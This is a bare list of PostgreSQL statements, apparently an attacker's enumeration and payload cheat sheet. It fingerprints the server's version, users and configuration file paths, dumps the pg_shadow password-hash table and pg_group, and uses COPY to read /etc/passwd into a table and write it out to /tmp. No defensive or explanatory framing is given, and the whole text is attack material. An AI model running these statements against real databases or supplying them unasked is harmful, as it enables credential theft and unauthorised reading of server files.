SELECT version();	
SELECT current_database();
SELECT current_user;
SELECT session_user;
SELECT current_setting('log_connections');
SELECT current_setting('log_statement');
SELECT current_setting('port');
SELECT current_setting('password_encryption');
SELECT current_setting('krb_server_keyfile');
SELECT current_setting('virtual_host');
SELECT current_setting('port');
SELECT current_setting('config_file');
SELECT current_setting('hba_file');
SELECT current_setting('data_directory');
SELECT * from pg_shadow;
SELECT * from pg_group;
CREATE table myfile (input TEXT);
COPY myfile from '/etc/passwd'; 
SELECT * from myfile;copy myfile to /tmp/test;